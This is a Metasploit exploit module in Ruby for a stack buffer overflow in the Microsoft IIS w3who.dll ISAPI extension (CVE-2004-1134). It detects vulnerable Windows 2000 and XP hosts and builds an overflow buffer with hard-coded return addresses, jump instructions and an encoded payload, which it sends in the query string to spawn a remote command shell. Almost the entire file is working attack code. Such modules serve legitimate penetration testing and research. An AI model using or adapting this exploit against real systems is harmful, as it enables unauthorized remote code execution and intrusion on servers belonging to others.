1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
10
  include Msf::Exploit::Remote::HttpClient
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
17
        'Description' => %q{
18
          This module exploits a stack buffer overflow in the w3who.dll ISAPI
19
          application. This vulnerability was discovered Nicolas
20
          Gregoire and this code has been successfully tested against
21
          Windows 2000 and Windows XP (SP2). When exploiting Windows
22
          XP, the payload must call RevertToSelf before it will be
23
          able to spawn a command shell.
24
        },
25
        'Author' => [ 'hdm' ],
26
        'License' => MSF_LICENSE,
27
        'References' => [
28
          [ 'CVE', '2004-1134' ],
29
          [ 'OSVDB', '12258' ],
30
          [ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
31
          [ 'BID', '11820' ]
32
        ],
33
        'Privileged' => false,
34
        'DefaultOptions' => {
35
          'EXITFUNC' => 'process',
36
        },
37
        'Payload' => {
38
          'Space' => 632,
39
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
40
          'MinNops' => 128,
41
          'StackAdjustment' => -3500,
42

43
        },
44
        'Platform' => 'win',
45
        'Targets' => [
46
          ['Automatic Detection', {}],
47
          ['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
48
          ['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
49
        ],
50
        'DefaultTarget' => 0,
51
        'DisclosureDate' => '2004-12-06',
52
        'Notes' => {
53
          'Reliability' => UNKNOWN_RELIABILITY,
54
          'Stability' => UNKNOWN_STABILITY,
55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
56
        }
57
      )
58
    )
59

60
    register_options(
61
      [
62
        OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
63
      ]
64
    )
65
  end
66

67
  def auto_target
68
    res = send_request_raw(
69
      {
70
        'uri' => normalize_uri(datastore['URL'])
71
      }, -1
72
    )
73
    http_fingerprint({ :response => res }) # XXX: Needs custom body match
74

75
    # Was a vulnerable system detected?
76
    t = nil
77
    if (res and res.body =~ /Access Token/)
78
      case res.headers['Server']
79
      when /5\.1/
80
        t = targets[2]
81
      else
82
        t = targets[1]
83
      end
84
    end
85
    t
86
  end
87

88
  def check
89
    if auto_target
90
      return Exploit::CheckCode::Appears
91
    end
92

93
    Exploit::CheckCode::Safe
94
  end
95

96
  def exploit
97
    if (target.name =~ /Automatic/)
98
      mytarget = auto_target
99
    else
100
      mytarget = target
101
    end
102

103
    if not mytarget
104
      fail_with(Failure::NoTarget, "No valid target found")
105
    end
106

107
    buf = rand_text_english(8192, payload_badchars)
108
    buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
109
    buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')
110
    buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
111
    buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
112

113
    print_status("Sending request...")
114
    r = send_request_raw({
115
      'uri' => normalize_uri(datastore['URL']),
116
      'query' => buf
117
    }, 5)
118

119
    handler
120
  end
121
end
122

123